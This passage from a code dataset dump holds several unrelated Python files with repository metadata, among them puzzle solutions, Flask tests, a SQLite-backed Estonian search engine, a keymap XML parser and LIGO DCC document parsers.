populate_database()","repo_name":"Mzee1991/NeoCare-App","sub_path":"v2/districts/Kiruhura/Kenshunga.py","file_name":"Kenshunga.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74916161871","text":"input_file = \"./input.txt\"\noutput_file = \"./output2.txt\"\n\n\ndef count_chars(col: list, highest_occurrence: bool, tie_breaker: str):\n result = {\"0\": 0, \"1\": 0}\n\n for char in col:\n if f\"{char}\" == \"0\":\n result[\"0\"] += 1\n else:\n result[\"1\"] += 1\n\n if result[\"0\"] == result[\"1\"]:\n return tie_breaker\n elif result[\"0\"] > result[\"1\"]:\n return \"0\" if highest_occurrence else \"1\"\n else:\n return \"1\" if highest_occurrence else \"0\"\n\n\ndef reduce_grid(\n grid: list, current_idx: int, highest_occurrence: bool, tie_breaker: str\n):\n working_col = [row[current_idx] for row in grid]\n key = count_chars(working_col, highest_occurrence, tie_breaker)\n\n new_grid = 
[row for row in grid if row[current_idx] == key]\n\n # print(\n # f\"key: {key}, current_index: {current_idx}, grid_size: {len(new_grid)}, old_grid: {len(grid)}\"\n # )\n # for line in new_grid:\n # print(line)\n\n if len(new_grid) == 1:\n return int(\"\".join(new_grid[0]), 2)\n else:\n return reduce_grid(new_grid, current_idx + 1, highest_occurrence, tie_breaker)\n\n\ndef main():\n with open(input_file, \"r\") as input:\n grid = [list(line.strip()) for line in input]\n\n oxygen = reduce_grid(grid, 0, True, \"1\")\n co2 = reduce_grid(grid, 0, False, \"0\")\n\n print(\"Oxygen:\", oxygen)\n print(\"CO2:\", co2)\n print(\"Life support:\", oxygen * co2)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"morfien101/adventofcode","sub_path":"2021/03/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14769328766","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\ndef path_to_x(head, x):\n if head is None:\n return None\n if head.val == x:\n return str(x)\n path = str(head.val)\n left = path_to_x(head.left, x)\n if left:\n return path + left\n right = path_to_x(head.right, x)\n if right:\n return path + right\n return None\n\ndef lca(head, v1, v2):\n path_to_v1 = path_to_x(head, v1)\n path_to_v2 = path_to_x(head, v2)\n if path_to_v1 is None or path_to_v2 is None:\n return None\n\n common_ancestor = str(head.val)\n i = 0\n while i < len(path_to_v1) and i < len(path_to_v2):\n if path_to_v1[i] == path_to_v2[i]:\n common_ancestor = path_to_v1[i]\n i += 1\n else:\n break\n return common_ancestor\n\n# Set up tree\nhead = Node(5)\nhead.left = Node(1)\nhead.left.left = Node(3)\nhead.left.right = Node(8)\nhead.left.left.left = Node(6)\nhead.left.left.right = Node(7)\nhead.right = Node(4)\nhead.right.left = Node(9)\nhead.right.right = Node(2)\n\nprint(lca(head, 7,1))","repo_name":"nickgreenquist/InterviewPrep","sub_path":"11 Essential Interview Questions/Linked Lists and Trees/lowest_common.py","file_name":"lowest_common.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43137154241","text":"import re\n\nimport tiledbsoma as soma\n\n\ndef _get_experiment(census: soma.Collection, organism: str) -> soma.Experiment:\n \"\"\"Given a census ``soma.Collection``, return the experiment for the named organism.\n Organism matching is somewhat flexible, attempting to map from human-friendly\n names to the underlying collection element name.\n\n Args:\n census: soma.Collection\n The census.\n organism: str\n The organism name, eg., ``Homo sapiens``.\n\n Returns:\n A soma.Experiment object with the requested experiment.\n\n Raises:\n ValueError: if unable to find the specified organism.\n\n Lifecycle:\n maturing\n\n Examples:\n\n >>> human = get_experiment(census, 'homo sapiens')\n\n >>> human = get_experiment(census, 'Homo sapiens')\n\n >>> human = get_experiment(census, 'homo_sapiens')\n \"\"\"\n # lower/snake case the organism name to find the experiment name\n exp_name = re.sub(r\"[ ]+\", \"_\", organism).lower()\n\n if exp_name not in census[\"census_data\"]:\n raise ValueError(f\"Unknown organism {organism} - does not exist\")\n exp = census[\"census_data\"][exp_name]\n if exp.soma_type != \"SOMAExperiment\":\n raise ValueError(f\"Unknown organism {organism} - not a SOMA Experiment\")\n\n return 
exp\n","repo_name":"chanzuckerberg/cellxgene-census","sub_path":"api/python/cellxgene_census/src/cellxgene_census/_experiment.py","file_name":"_experiment.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"83"} +{"seq_id":"8540636610","text":"#!/usr/bin/env python3\n\nimport os\nimport requests\nimport json\nimport sqlite3\nfrom collections import OrderedDict\nfrom typing import List, Dict, Tuple, Union\nfrom operator import itemgetter\n\nclass SEARCH_DB:\n def __init__(self):\n \"\"\"Muutijate algväärtustamine ja andmebaasi avamine\n\n Raises:\n Exception: Kui andmebaasi avamine ebaõnnestus\n \"\"\"\n self.VERSION=\"2023.10.02\" # otsimootori versioon\n\n self.db_index = os.environ.get('DB_INDEX') # otsime andmebaasi nime keskkonnamootujast\n if self.db_index is None: # kui seal polnud...\n self.db_index = './index.sqlite' # ...võtame vaikimisi\n\n # avame andmebaasi ainult lugemiseks\n\n try:\n self.con_index = sqlite3.connect(f'file:{self.db_index}?mode=rw', \n uri=True, check_same_thread=False)\n except:\n self.con_index = None\n raise Exception({\"error\": \n f'Andmebaasi {self.db_index} avamine ebaõnnestus'})\n \n self.cur_index = self.con_index.cursor()\n\n self.ea_paring = os.environ.get('EA_PARING')\n if self.ea_paring is None:\n self.EA_PARING_IP=os.environ.get('EA_PARING_IP') if os.environ.get('EA_PARING_IP') != None else 'localhost'\n self.EA_PARING_PORT=os.environ.get('EA_PARING_PORT') if os.environ.get('EA_PARING_PORT') != None else '6602'\n self.ea_paring = f'http://{self.EA_PARING_IP}:{self.EA_PARING_PORT}/api/ea_paring/json'\n\n def __del__(self)->None:\n \"\"\"Sulgeme avatud andmebaasid\n \"\"\"\n if self.con_index is not None:\n self.con_index.close()\n\n def otsing(self, fragments:bool, query_str:str, query_json:Dict)->None:\n \"\"\"Public: Otsing: päringus ja indeksis sõnavormid\n\n Args:\n fragments (bool): \n * True: vaatame liitsõna osasõnasid, \n * False: ei vaata liitsõna osasõnasid\n\n query_json (Dict): päring (vastava veebiteenusega lemmade \n kombinatsiooniks teisendatud otsisõned)\n \"\"\"\n self.fragments = fragments # kas otsime liitsõna osasõndest\n self.query_str = query_str # jokksev päringustring\n self.query_json = query_json # jooksev päringujson\n self.result_json = {} # otsingutulemus\n\n if len(self.query_json[\"annotations\"][\"query\"]) > 0:\n self.otsing_rec(0, []) # rekursiivne otsing, tulemus self.result_json\n for docid in self.result_json:\n self.result_json[docid] = sorted(self.result_json[docid].items())\n\n # otsingutulemuste korrastamine\n #for docid in self.result_json: #järjestame otsingutulemused iga dokumendi siseselt\n # self.result_json[docid] = OrderedDict(sorted(self.result_json[docid].items(), key=lambda t: t[0]))\n\n def otsing_rec(self, query_idx:int, required_docids:List[str])->bool:\n \"\"\"Private: Rekursiivne otsingualgoritm\n\n Args:\n query_idx (int): parajasti vaatame niimitmendat \n päringusõne range(0, len(self.query_json[\"annotations\"][\"query\"]))\n\n required_idx_docid (str): otsitav peab olema selles dokumendis, \n None - suvaline dokument sobib\n\n Returns:\n bool: False: ei leidnud midagi sobivat; True: leidsime midagi \n sobivat, vt self.result_json \n \"\"\"\n\n docids_list, res_dct = self.leia_indeksist(query_idx, required_docids)\n if len(docids_list) < 1:\n return False # mitte ükski dokument ei sobinud\n \n if query_idx+1 >= len(self.query_json[\"annotations\"][\"query\"]):\n self.result_json = res_dct # Lisame 
\n            return True # the search produced results\n\n        if self.otsing_rec(query_idx+1, docids_list) is False:\n            return False\n\n        for docid in res_dct:\n            if docid in self.result_json:\n                self.result_json[docid].update(res_dct[docid])\n\n        return True # report whether anything suitable was found\n\n    def leia_indeksist(self, query_idx:int, required_docids:List[str])->Tuple[List[str], Dict]:\n        where_tingimus = 'lemma in (\"' + '\",\"'.join(self.query_json[\"annotations\"][\"query\"][query_idx]) + '\")'\n        if self.fragments is False:\n            where_tingimus += f' AND \"liitsona_osa\" = 0'\n        if len(required_docids) > 0:\n            where_tingimus += ' AND docid in (\"' + '\",\"'.join(required_docids) + '\")'\n\n        res_exec = self.cur_index.execute(f'''\n            SELECT\n                indeks.docid,\n                indeks.start,\n                indeks.end,\n                lemma_korpuse_vormid.vorm,\n                lemma_korpuse_vormid.lemma,\n                indeks.liitsona_osa\n            FROM lemma_korpuse_vormid\n            INNER JOIN indeks ON lemma_korpuse_vormid.vorm = indeks.vorm\n            WHERE {where_tingimus}''')\n        res_list = res_exec.fetchall()\n        #          0      1      2    3     4      5\n        # res_list[(docid, start, end, vorm, lemma, liitsona_osa)]\n        # res_dct = { DOCID: { START: { \"end\":int, \"features\":[{\"vorm\":str, \"lemma\":str, liitsona_osa:int }]}}\n        res_dct = {}\n        docids_list = []\n        for list_item in res_list:\n            if list_item[0] not in docids_list:\n                docids_list.append(list_item[0])\n            if list_item[0] not in res_dct: # docid\n                res_dct[list_item[0]] = {}\n            if list_item[1] not in res_dct[list_item[0]]: # start\n                res_dct[list_item[0]][list_item[1]] = {\"end\":list_item[2], \"features\":[]}\n            item = (list_item[3], list_item[4],list_item[5])\n            if item not in res_dct[list_item[0]][list_item[1]][\"features\"]:\n                res_dct[list_item[0]][list_item[1]][\"features\"].append(item)\n        return docids_list, res_dct\n\n    def koosta_vastus(self, formaat:str, norm_paring:bool)->None:\n        \"\"\"Public: render the search result as HTML in one form or another.\n\n        Args:\n            formaat (str): presentation format of the result {html|html+details|json}\n\n        Returns:\n            str: the search result in the requested form\n        \"\"\"\n        self.content = '<br><br>Päring:<br><br>'\n        if norm_paring is True:\n            self.content += json.dumps(self.query_json, ensure_ascii=False, indent=2).replace(' ', '&nbsp;').replace('\\n', '<br>')+'<br>'\n        else:\n            self.content += f'{self.query_str}<br><br>'\n        if formaat == 'json':\n            self.koosta_vastus_json()\n        else:\n            self.koosta_vastus_html(formaat)\n\n    def koosta_vastus_json(self)->None:\n        \"\"\"Private: present the JSON search result as HTML.\n\n        Returns:\n            (str) self.content: the JSON search result in HTML form\n        \"\"\"\n        self.content += \"<br><br>Tulemus:<br><br>\"\n        self.content += json.dumps(self.result_json, ensure_ascii=False, indent=2).replace(' ', '&nbsp;').replace('\\n', '<br>')+'<br>'\n\n    def koosta_vastus_html(self, formaat:str)->None:\n        \"\"\"Private: present the JSON search result as marked-up text in HTML.\n\n        Args:\n            formaat (str): presentation format of the result {\"html\"|\"html+details\"|\"json\"}\n\n        Returns:\n            str: the JSON search result as marked-up text in HTML\n        \"\"\"\n        if len(self.result_json) <= 0:\n            self.content += 'Päringule vastavaid dokumente ei leidunud!'\n        else:\n            # res_dct = { DOCID: { START: { \"end\":int, \"features\":[{\"vorm\":str, \"lemma\":str, liitsona_osa:int }]}}\n            for docid in self.result_json:\n                # fetch the source text from the database\n                source_content = self.cur_index.execute(\n                    f'''SELECT content FROM allikad\n                        WHERE docid = \"{docid}\"''').fetchall()[0][0]\n                self.content += f'<br><br>DocID: {docid}<br><br>'\n                prev_end = 0\n                for inf in self.result_json[docid]: # (START, { \"end\":int, [{\"vorm\":str, \"lemma\":str, liitsona_osa:int }] })\n                    self.content += source_content[prev_end:inf[0]] # from the end of the previous hit to the start of this one\n                    self.content += f'<b>{source_content[inf[0]:inf[1][\"end\"]]}</b>' # highlight markup assumed; the original inline tag was lost\n                    #if formaat == 'text_details':\n                    #    self.content += f'[{\", \".join(link[\"tokens\"])}]'\n                    prev_end = inf[1][\"end\"]\n                self.content += f'{source_content[prev_end:]}<br>'\n                self.content = self.content.replace('\\n', '<br>
')\n\n ","repo_name":"estnltk/smart-search","sub_path":"wp/ea_paring_otsing/api_ea_paring_otsing.py","file_name":"api_ea_paring_otsing.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21978593319","text":"import pytest\nfrom todor.db import get_db\n\n\ndef test_index(client, auth):\n response = client.get('/')\n assert \"Zaloguj się\" in response.get_data(as_text=True)\n assert \"Utwórz konto\" in response.get_data(as_text=True)\n\n auth.login()\n response = client.get('/')\n assert 'Wyloguj się' in response.get_data(as_text=True)\n assert b'adres1@wp.pl' in response.data\n assert b'2018-01-01' in response.data\n assert b'test\\nbody' in response.data\n assert b'href=\"/1/edytuj\"' in response.data\n\n\n@pytest.mark.parametrize('path', (\n '/dodaj',\n '/1/edytuj',\n '/1/usun',\n))\ndef test_login_required(client, path):\n response = client.post(path)\n assert response.headers[\"Location\"] == \"/auth/login\"\n\n\ndef test_author_required(app, client, auth):\n # change the post author to another user\n with app.app_context():\n db = get_db()\n db.execute('UPDATE zadania SET id_user = 2 WHERE id = 1')\n db.commit()\n\n auth.login()\n # current user can't modify other user's post\n assert client.post('/1/edytuj').status_code == 403\n assert client.post('/1/usun').status_code == 403\n # current user doesn't see edit link\n assert b'href=\"/1/edytuj\"' not in client.get('/').data\n\n\n@pytest.mark.parametrize('path', (\n '/2/edytuj',\n '/2/usun',\n))\ndef test_exists_required(client, auth, path):\n auth.login()\n assert client.post(path).status_code == 404\n\n\ndef test_create(client, auth, app):\n auth.login()\n assert client.get('/dodaj').status_code == 200\n client.post('/dodaj', data={'zadanie': 'nowe'})\n\n with app.app_context():\n db = get_db()\n count = db.execute('SELECT COUNT(id) FROM zadania').fetchone()[0]\n assert count == 2\n\n\ndef test_update(client, auth, app):\n auth.login()\n assert client.get('/1/edytuj').status_code == 200\n client.post('/1/edytuj', data={'zadanie': 'poprawione'})\n\n with app.app_context():\n db = get_db()\n post = db.execute('SELECT * FROM zadania WHERE id = 1').fetchone()\n assert post['zadanie'] == 'poprawione'\n\n\n@pytest.mark.parametrize('path', (\n '/dodaj',\n '/1/edytuj',\n))\ndef test_create_update_validate(client, auth, path):\n auth.login()\n response = client.post(path, data={'zadanie': '', 'id': 1})\n assert 'Zadanie nie może być puste.' 
{"seq_id":"37317715765","text":"import sys\nnum = int(input())\nnum_list = list(map(int,sys.stdin.readline().split()))\nres = 0\ntotal = sum(num_list) # avoid shadowing the builtin sum()\nfor i in num_list:\n total -= i\n res += (i * total)\nres = res % 1000000007\nprint(res)","repo_name":"MilkyWay-U/Baekjoon","sub_path":"Python/23827.py","file_name":"23827.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"34940022230","text":"# _*_coding:utf-8_*_\n# Author : Leo\n# Time : 17/12/2018\nimport requests\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36\"}\nparam={\"wd\":\"python\"}\nurl_temp=\"https://www.baidu.com/s\"\n\nresponse=requests.get(url_temp,headers=headers,params=param)\nprint(response.status_code)\nprint(response.request.url)","repo_name":"UltramanShuai/request_basic","sub_path":"first_try/try_params.py","file_name":"try_params.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"2528510741","text":"import pathlib\nimport xml.etree.ElementTree as ElementTree\nfrom pprint import pprint\nfrom typing import Dict\n\n\ndef parse_keymap(keymap) -> Dict[str, Dict[str, str]]:\n \"\"\"\n Parse a keymap file (a file with key-combination settings)\n and return a dictionary of the form:\n {command1: { key1: modifier_code,\n key2: modifier_code,...\n key3: modifier_code},...}\n\n @param keymap: example (r'D:/BFR.xml')\n @return: dict { '$Redo': {\n 'back_space': 'as',\n 'z': 'cs'\n },\n 'Back': {\n 'button4': 'push',\n 'left': 'ac'\n },\n \"\"\"\n if isinstance(keymap, str):\n tree = ElementTree.parse(pathlib.Path(keymap))\n else:\n tree = ElementTree.parse(keymap)\n ###############\n # example tree\n # <keymap>\n # <action id=\"$Redo\">\n # <keyboard-shortcut first-keystroke=\"shift ctrl Z\"/>\n ################\n\n root = tree.getroot()\n actions = {}\n for action in root:\n action_name = action.attrib['id']\n shortcuts = {}\n for combo in action:\n # skip combinations of the form\n # <keyboard-shortcut first-keystroke=\"...\" second-keystroke=\"...\"/>\n if len(combo.attrib.keys()) == 1:\n for subkey in combo.attrib.keys():\n # \"shift ctrl Z\"\n mod_keys_with_key = combo.attrib.get(subkey).lower()\n *mod_keys, k_key = mod_keys_with_key.split()\n if len(mod_keys) != 0:\n mod_abbr = \"\".join(\n [mod_key[0] for mod_key in sorted(mod_keys)])\n # [shift, ctrl] => 'cs'\n else:\n mod_abbr = \"push\"\n shortcuts.update({k_key: mod_abbr})\n actions[action_name] = shortcuts\n return actions\n\n\nif __name__ == \"__main__\":\n # print(get_commands_with_modifiers())\n # pprint(parse_settings_file(r'D:/Windows.xml'))\n\n pprint(parse_keymap(r\"D:Empty.xml\"))\n","repo_name":"katafoxi/keybinds-map","sub_path":"kmap/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"20536793748","text":"import pandas as pd\nimport os, csv\n\nCSV_PATH = r'C:\Users\surface\Desktop\YouWe\OCR\Utilities\output\Training Data\Reformated csv'\nCSV_files = os.listdir(CSV_PATH)\nOCR_PATH = r'C:\Users\surface\Desktop\YouWe\OCR\Utilities\output\Training Data\Reformated ocr'\nOCR_files = os.listdir(OCR_PATH)\nOUT_PATH = r'C:\Users\surface\Desktop\YouWe\OCR\Utilities\output\Training Data'\n\nc = 0\nk = 1\nfor i in range(len(OCR_files)):\n ocr_file = OCR_files[i]\n csv_file = CSV_files[k]\n if ocr_file == csv_file:\n c+=1\n print('match!', c)\n k+=1\n os.chdir(OCR_PATH)\n df_ocr = pd.read_csv(ocr_file, header=None, encoding='ISO-8859-1', sep='\t') # tab-separated OCR output\n os.chdir(CSV_PATH)\n df_csv = pd.read_csv(csv_file, header=0, encoding='ISO-8859-1', sep=',')\n df_join = df_ocr.join(df_csv)\n os.chdir(OUT_PATH)\n df_join.to_csv('{}.csv'.format(os.path.splitext(ocr_file)[0]), index=False, encoding='ISO-8859-1')\n elif ocr_file != csv_file:\n print(csv_file, ocr_file)\n k+=2\n
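# The k/i bookkeeping above assumes CSV_files holds one extra leading entry
# (k starts at 1 and advances by 2 on a mismatch). A hypothetical name-keyed
# pairing would be more robust, e.g.:
# csv_by_stem = {os.path.splitext(f)[0]: f for f in CSV_files}
# csv_file = csv_by_stem.get(os.path.splitext(ocr_file)[0])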
print(c)\n","repo_name":"JonasRosenzweig/OCR-","sub_path":"Utilities/training_data.py","file_name":"training_data.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"86642312875","text":"\"\"\"Record parsing.\"\"\"\n\n\nimport re\nfrom functools import cached_property\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom .exceptions import (\n NotLoggedInError,\n UnrecognisedDCCRecordError,\n UnauthorisedError,\n)\n\n\nclass DCCParser:\n \"\"\"A parser for DCC documents.\n\n Parameters\n ----------\n content : str\n The response body.\n \"\"\"\n\n def __init__(self, content):\n self.content = content\n\n def html_navigator(self):\n \"\"\"An HTML navigator for the document content.\n\n Returns\n -------\n :class:`bs4.BeautifulSoup`\n The HTML navigator.\n \"\"\"\n return BeautifulSoup(self.content, \"html.parser\")\n\n def dcc_numbers(self):\n \"\"\"Potential DCC numbers contained within the text of the document.\n\n Returns\n -------\n :class:`set`\n Potential DCC numbers.\n \"\"\"\n from .records import DCCNumber\n\n available_letters = \"\".join(DCCNumber.document_type_letters)\n dcc_number_pattern = re.compile(\n fr\"(LIGO-)?([{available_letters}]\\d{{5,}}(-(x0|v\\d+))?)\"\n )\n\n found = set()\n\n # Search for DCC numbers in the text.\n # Use the HTML navigator so BeautifulSoup deals with the encoding, even though\n # we don't necessarily insist the input is HTML.\n navigator = self.html_navigator()\n for match in dcc_number_pattern.findall(str(navigator)):\n if match:\n found.add(match[1])\n\n return found\n\n\nclass DCCXMLRecordParser(DCCParser):\n \"\"\"A parser for DCC XML record documents.\"\"\"\n\n def __init__(self, content):\n super().__init__(content)\n self.docrev = None\n self._parse()\n\n def _parse(self):\n # Strip out anything not supposed to be here, that would otherwise cause parser\n # errors.\n content = self.content.replace(\"\\u000b\", \"\") # Vertical tab character (L1200193)\n\n try:\n self.root = ET.fromstring(content)\n except ET.ParseError:\n # This is not an XML document. Do we have an error page instead? Use the\n # HTML parser to find out.\n navigator = self.html_navigator()\n\n # Check if we have the login page, specified by the presence of an h3 with\n # specific text.\n if navigator.find(\"h3\", text=\"Accessing private documents\"):\n raise NotLoggedInError()\n\n # Check if we have the default page (DCC redirects here for all unrecognised\n # requests).\n if navigator.find(\"strong\", text=\"Search for Documents by\"):\n raise UnrecognisedDCCRecordError()\n\n # Check if we have the error page.\n if navigator.find(\"dt\", class_=\"Error\"):\n # We have an error, but what is its message?\n if navigator.find(\n \"dd\",\n text=re.compile(\n \"User .*? is not authorized to view this document.\"\n ),\n ):\n # Unauthorised.\n raise UnauthorisedError()\n\n raise\n\n if not self.root.attrib[\"project\"] == \"LIGO\":\n # Invalid DCC document.\n raise UnrecognisedDCCRecordError()\n\n self.docrev = self.root[0][0]\n\n @cached_property\n def dcc_number_pieces(self):\n t = self.docrev.find(\"dccnumber\").text[0]\n n = self.docrev.find(\"dccnumber\").text[1:]\n v = self.docrev.attrib[\"version\"]\n return t, n, v\n\n @cached_property\n def docid(self):\n return self.docrev.attrib[\"docid\"]\n\n @cached_property\n def title(self):\n return self.docrev.find(\"title\").text\n\n @cached_property\n def authors(self):\n for a in self.docrev.findall(\"author\"):\n name = a.find(\"fullname\").text\n\n try:\n enum = a.find(\"employeenumber\").text\n except AttributeError:\n enum = None\n\n yield name, enum, a.get(\"id\")\n\n @cached_property\n def abstract(self):\n return self.docrev.find(\"abstract\").text\n\n @cached_property\n def keywords(self):\n return [k.text for k in self.docrev.findall(\"keyword\")]\n\n @cached_property\n def note(self):\n return self.docrev.find(\"note\").text\n\n @cached_property\n def publication_info(self):\n return self.docrev.find(\"publicationinfo\").text\n\n @cached_property\n def journal_reference(self):\n ref = self.docrev.find(\"reference\")\n\n if not ref:\n return\n\n journal = ref.find(\"journal\").text\n volume = ref.find(\"volume\").text\n page = ref.find(\"page\").text\n citation = ref.find(\"citation\").text\n url = ref.attrib.get(\"href\")\n\n return journal, volume, page, citation, url\n\n @cached_property\n def other_version_numbers(self):\n return set(\n [int(r.attrib[\"version\"]) for r in self.docrev.find(\"otherversions\")]\n )\n\n @cached_property\n def revision_dates(self):\n # DCC dates use the Pacific timezone\n pacific = pytz.timezone(\"US/Pacific\")\n\n # parse modified date string localised to Pacific Time\n modified = pacific.localize(\n datetime.strptime(self.docrev.attrib[\"modified\"], \"%Y-%m-%d %H:%M:%S\")\n )\n\n # other dates aren't in XML yet\n return None, modified, None\n\n @cached_property\n def attached_files(self):\n for file_ in self.docrev.findall(\"file\"):\n name = file_.find(\"name\").text\n\n try:\n title = file_.find(\"description\").text\n except AttributeError:\n title = name\n\n url = file_.attrib[\"href\"]\n yield title, name, url\n\n @cached_property\n def related_ids(self):\n return self._extract_refs(\"xrefto\")\n\n @cached_property\n def referencing_ids(self):\n return self._extract_refs(\"xrefby\")\n\n def _extract_refs(self, field):\n for field in self.docrev.findall(field):\n # Extract the DCC number.\n # Note some xref elements don't have an alias, e.g. M950046; these are\n # ignored.\n alias = field.attrib.get(\"alias\")\n if alias:\n yield alias\n\n\nclass DCCXMLUpdateParser(DCCParser):\n \"\"\"A parser for DCC XMLUpdate responses.\"\"\"\n\n def _parse(self):\n # Get an HTML navigator object for the record.\n navigator = self.html_navigator()\n\n # Accept if the page reports a successful modification.\n if navigator.find(string=re.compile(\".*You were successful.*\")):\n return\n\n # Check if we have the login page, specified by the presence of an h3 with\n # specific text.\n if navigator.find(\"h3\", text=\"Accessing private documents\"):\n raise NotLoggedInError()\n\n # Check if we have the default page (DCC redirects here for all unrecognised\n # requests).\n if navigator.find(\"strong\", text=\"Search for Documents by\"):\n raise UnrecognisedDCCRecordError()\n\n # Check if we have the error page.\n if navigator.find(\"dt\", class_=\"Error\"):\n # We have an error, but what is its message?\n if navigator.find(\"dd\", text=re.compile(\".* is invalid.*\")):\n # Record number not valid.\n raise ValueError(\"record number not valid\")\n if navigator.find(\"dd\", text=re.compile(\".* is not modifiable by user.*\")):\n # Unauthorised to update.\n raise UnauthorisedError()\n\n raise Exception(\"Invalid XML update document\")\n","repo_name":"SeanDS/dcc","sub_path":"src/dcc/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":7705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"}
{"seq_id":"42445950752","text":"import logging\nimport re\nfrom urllib.parse import urlparse\nimport requests\n\nfrom grimoirelab_toolkit.datetime import str_to_datetime\n\nfrom .enrich import Enrich, metadata\nfrom ..elastic_mapping import Mapping as BaseMapping\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Mapping(BaseMapping):\n\n @staticmethod\n def get_elastic_mappings(es_major):\n \"\"\"Get Elasticsearch mapping.\n\n :param es_major: major version of Elasticsearch, as string\n :returns: dictionary with a key, 'items', with the mapping\n \"\"\"\n\n mapping = \"\"\"\n {\n \"properties\": {\n \"text_analyzed\": {\n \"type\": \"text\",\n \"fielddata\": true,\n \"index\": true\n }\n }\n } \"\"\"\n\n return {\"items\": mapping}\n\n\nclass GitterEnrich(Enrich):\n\n mapping = Mapping\n\n # REGEX to extract links from HTML text\n HTML_LINK_REGEX = re.compile(\"href=[\\\"\\'](.*?)[\\\"\\']\")\n\n def __init__(self, db_sortinghat=None, db_projects_map=None, json_projects_map=None,\n db_user='', db_password='', db_host=''):\n super().__init__(db_sortinghat, db_projects_map, json_projects_map,\n db_user, db_password, db_host)\n\n def get_field_author(self):\n return \"fromUser\"\n\n def get_sh_identity(self, item, identity_field=None):\n # email not available for gitter\n identity = {\n 'username': None,\n 'name': None,\n 'email': None\n }\n\n if self.get_field_author() not in item['data']:\n return identity\n from_ = item['data'][self.get_field_author()]\n\n identity['username'] = from_.get('username', None)\n identity['name'] = from_.get('displayName', None)\n\n return identity\n\n def get_identities(self, item):\n \"\"\" Return the identities from an item \"\"\"\n\n identity = self.get_sh_identity(item)\n yield identity\n\n def get_project_repository(self, eitem):\n tokens = eitem['origin'].rsplit(\"/\", 1)\n return tokens[0] + \" \" + tokens[1]\n\n @metadata\n def get_rich_item(self, item):\n\n eitem = {}\n\n self.copy_raw_fields(self.RAW_FIELDS_COPY, item, eitem)\n\n message = item['data']\n\n eitem['unread'] = 1 if message['unread'] else 0\n eitem['text_analyzed'] = message['text']\n\n copy_fields = [\"readBy\", \"issues\", \"id\"]\n\n for f in copy_fields:\n if f in message:\n eitem[f] = message[f]\n else:\n eitem[f] = None\n\n eitem.update(self.get_rich_links(item['data'], item['uuid'], item['origin']))\n\n message_timestamp = str_to_datetime(eitem['metadata__updated_on'])\n eitem['tz'] = int(message_timestamp.strftime(\"%H\"))\n\n if self.sortinghat:\n eitem.update(self.get_item_sh(item))\n\n if self.prjs_map:\n eitem.update(self.get_item_project(eitem))\n\n eitem.update(self.get_grimoire_fields(item[\"metadata__updated_on\"], \"message\"))\n\n self.add_repository_labels(eitem)\n self.add_metadata_filter_raw(eitem)\n return eitem\n\n def get_rich_links(self, item, uuid, origin):\n\n rich_item = {}\n\n if item['issues']:\n self.extract_issues(item['issues'], item['html'], uuid, origin)\n\n if item['mentions']:\n rich_item['mentioned'] = self.extract_mentions(item['mentions'])\n\n rich_item['url_hostname'] = []\n\n if item['urls']:\n for url in item['urls']:\n try:\n url_parsed = urlparse(url['url'])\n rich_item['url_hostname'].append('{uri.scheme}://{uri.netloc}/'.format(uri=url_parsed))\n except ValueError: # url could not be properly parsed\n logger.error(\"[gitter] UUID {} - Could not parse URL '{}'\".format(uuid, url))\n continue\n\n return rich_item\n\n def extract_issues(self, issue_pr, html_text, uuid, origin):\n \"\"\"Enrich issues or PRs mentioned in the message\"\"\"\n\n project_repo = '/'.join(origin.split(\"/\")[-2:]).lower()\n\n links_found = self.HTML_LINK_REGEX.findall(html_text)\n for i, entity in enumerate(issue_pr):\n # Determine the kind of repo that the message refers to\n if 'repo' in entity.keys():\n r = entity['repo'].lower()\n if r == project_repo:\n repo_type = 'project'\n elif r.split('/')[0] == project_repo.split('/')[0]:\n repo_type = 'parent'\n else:\n repo_type = 'foreign'\n\n entity['repo_type'] = repo_type\n\n # First check to see if issue could be determined via parsed html link\n if 'repo' in entity.keys() and 'number' in entity.keys() and links_found:\n try:\n if links_found[i].split('/')[-2] == 'issues':\n entity['is_issue'] = entity['repo'] + ' #' + entity['number']\n elif links_found[i].split('/')[-2] == 'pull':\n entity['is_pull'] = entity['repo'] + ' #' + entity['number']\n else:\n continue\n entity['url'] = links_found[i]\n entity['repo_type'] = repo_type\n continue\n except IndexError:\n pass\n\n # If issue is referred to in a span tag, then we will need to connect to github\n # to determine if the issue is a pull request or issue\n if 'repo' in entity.keys() and 'number' in entity.keys():\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n url = 'https://github.com/' + entity['repo'] + '/issues/' + entity['number']\n response = requests.get(url, headers=headers)\n\n # Check to see if it is a redirect, then it is 